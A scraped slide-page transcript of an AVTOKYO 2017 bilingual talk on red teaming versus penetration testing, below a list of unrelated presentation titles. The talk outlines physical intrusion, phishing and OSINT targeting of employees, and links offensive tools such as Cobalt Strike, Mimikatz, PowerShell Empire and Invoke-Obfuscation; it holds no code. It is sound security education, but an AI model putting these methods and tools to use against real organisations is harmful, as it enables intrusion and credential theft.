Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 

[AVTOKYO 2017] What is red team?

  • 1. What is Red Team Service? ~Latest Penetration Test Trends in U.S.~ TOMOHISA ISHIKAWA scientia.admin@gmail.com www.scientia-security.org
  • 2. $$ WHO AM I ?  Tomohisa Ishikawa • Security Consultant (9 years experience) • Specialized Area • Penetration Test, IR, Security Consultation, Vulnerability Management, Awareness, Training, Global Security Management… • Various Speaker Experience • SANSFIRE 2011 & 2012, DEF CON 24 SE Village, LASCON 2016, BSides Philly 2017 • Certification Junkie • CISSP, CSSLP, CISA, CISM, CFE, GPEN, GWAPT, GXPN, GWEB, GSNA, GREM, GCIH
  • 3. Objective  Sharing One Year Experience in security team of U.S. insurance company  Understanding difference of Methodology • Traditional “Penetration Test” vs. “Red Team”
  • 5.
  • 6.
  • 7.
  • 8.
  • 9. 日本で言うペネトレーションテストって… Penetration Test in Japan is …  某L社とか某N社のページを見てみると.. Let’s see HP of N company, L company, M company… • Webセキュリティ診断サービス (Web Application Testing) • プラットフォーム診断サービス (Platform Testing) • 標的型攻撃診断サービス(メール訓練サービス・出口対策検証) • 無線LAN診断サービス • DDoS体制検証サービス  安全第一!! Safety of system is First Priority.  ※ ちなみにセキュリティ診断とペネトレーションテストをほぼ同じ意味で使いますが、宗教上の 理由でこの二つを一緒に語ることが許せない人とは適当に読み替えてください。
  • 12.
  • 13. What is “Red Team”?  もともと、諜報機関で生まれた概念 Originally, it is from intelligence community  敵の観点から作戦を検証したり、取得した情報の信憑性を批判的に 検証するチームのこと Verify strategies or information from adversary view point • Devil‘s Advocate(悪魔の弁護人) • CIA Red Cell
  • 14. What is the difference btw “Red Team” and “Pen Test”? ⇒ Coverage is different!! Digital Physical Social • Web Application Testing • Platform Testing • APT Simulation • APT Mail Awareness training • Vishing(Voice Phishing) • OSINT • Tail Gating • Impersonation • ID Card Cloning • Physical Access to box • Elevator Hacking • Physical Control Bypass
  • 15.
  • 16.
  • 17.  According to Gartner… • Long Term Challenge (NOT point-in-time assessment) • より長期的にテストを実施。実施時間も24時間いつでも実施する. • Defense Coordination • Blue Teamの機能も含めて評価を行い、改善につなげる。 • Adversary Simulation • 攻撃者そのものの観点から実施する。(3つの観点の融合) • Controlled but Real Intrusion What is the difference btw “Red Team” and “Pen Test”? ⇒ Different Feature
  • 18. Case 1: Physical Penetration Test
  • 19.  Objective • どこまで内部侵入して情報が取れるのか? Is it possible to bypass physical access control?  Methodology • Breaking Lock (Picking, impassioning, Bypassing) • Elevator Hacking • RFID Cloning • Social Engineering Physical Penetration Test
  • 20. Case 2: APT Adversary Simulation Service
  • 21.  SLA of APT Adversary Simulation Service is following. • Awareness Phishing • Penetration Test Phishing • Red Team Phishing 標的型攻撃サービス APT Adversary Simulation Service
  • 22.  Attempting attacks as same as “Japan Pension Service” • Following Cyber Kill Chain • OSINT & SOCMINT • Selecting 2~3 targets, and sending attached email • Exploitation • Using “Fresh” vulnerability & Exploit • Post Exploitation with PowerShell • Password Cracking with GPU • Lateral Movement & Reaching out “Treasures” Red Team Phishing
  • 23. OSINT Example  Check LinkedIn and find out target  Analyzing Twitter with SOCMINT Tools • Target has a tendency to buy shoes in apparel shop • Sending Coupon by pretending as appeal shop
  • 24. TOOLS  OSINT • Maltago https://www.paterva.com/web7/ • FOCA https://www.elevenpaths.com/labstools/foca/index.html • SpiderFoot http://www.spiderfoot.net/ • Discovery Script https://github.com/leebaird/discover • Recon-ng https://bitbucket.org/LaNMaSteR53/recon-ng • Cymon https://cymon.io/ • WeLink https://welink.com/dashboard/ • GEOFEEDIA https://geofeedia.com/ • ECHOSEC https://www.echosec.net/
  • 25. TOOLS  OTHER TOOLS (Part of them is experimental) • GoPhish https://getgophish.com/ • Social Engineering Toolkit in Kali Linux • Cobalt Strike https://www.cobaltstrike.com/ • Mimikatz https://github.com/gentilkiwi/mimikatz • Responder https://github.com/SpiderLabs/Responder • IPMI http://fish2.com/ipmi/remote-pw-cracking.html • MITM Framework https://github.com/byt3bl33d3r/MITMf • Spray WMI https://github.com/trustedsec/spraywmi
  • 26.
  • 27.
  • 28.
  • 29. TOOLS  PowerShell Tools • PowerShell Empire https://github.com/EmpireProject/Empire • EmPyre (Python) https://github.com/EmpireProject/EmPyre • PowerSploit https://github.com/PowerShellMafia/PowerSploit • Including PowerView・Invoke-Mimikatz・PowerUp • Veil Framework https://www.veil-framework.com/ • Nishang https://github.com/samratashok/nishang • Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation • PS Attack https://github.com/jaredhaight/psattack • NaishoDeNusumu https://github.com/3nc0d3r/NaishoDeNusumu • BloodHound https://github.com/BloodHoundAD/BloodHound
  • 30.
  • 31.
  • 32. Resource  Great Presentation • AD Security https://adsecurity.org/ • All presentation is awesome • Adversarial Post-Exploitation: Lessons From The Pros • https://www.youtube.com/watch?v=x3crG-hM9sc • A Year in the Empire • https://www.youtube.com/watch?v=ngvHshHCt_8 • PowerShell Secrets and Tactics • https://www.youtube.com/watch?v=EQv4bJnCw8M • Introducing PowerShell into your Arsenal with PS>Attack • https://www.youtube.com/watch?v=mPckt6HQPsw • Invoke-Obfuscation: PowerShell obFUsk8tion Techniques • https://www.youtube.com/watch?v=P1lkflnWb0I
  • 33. From Blue Team Side  以下が本当に重要!! • Full Spectrum Visibility (完全な可視化) • Targeted Containment (標的型封じ込め)  EDR (Endpoint Detection & Response) • Ex) Tanium, Fidelis, Carbon Black, FireEye, Crowd Strike, Red Cloak, Cyber Reason…
  • 34. Wrap-Up  “Red team” is U.S. trends  Focus on comprehensive test
  • 35. Thank You!!  If you have any questions, please feel free to contact me Contact Info • Email scientia.admin@gmail.com • JP Blog www.scientia-security.org
  • 37. Digital Penetration Test Certification  Certification for Penetration Tester • CEH (by EC-Council) • GIAC (by SANS) • OSCP (by Offensive Security)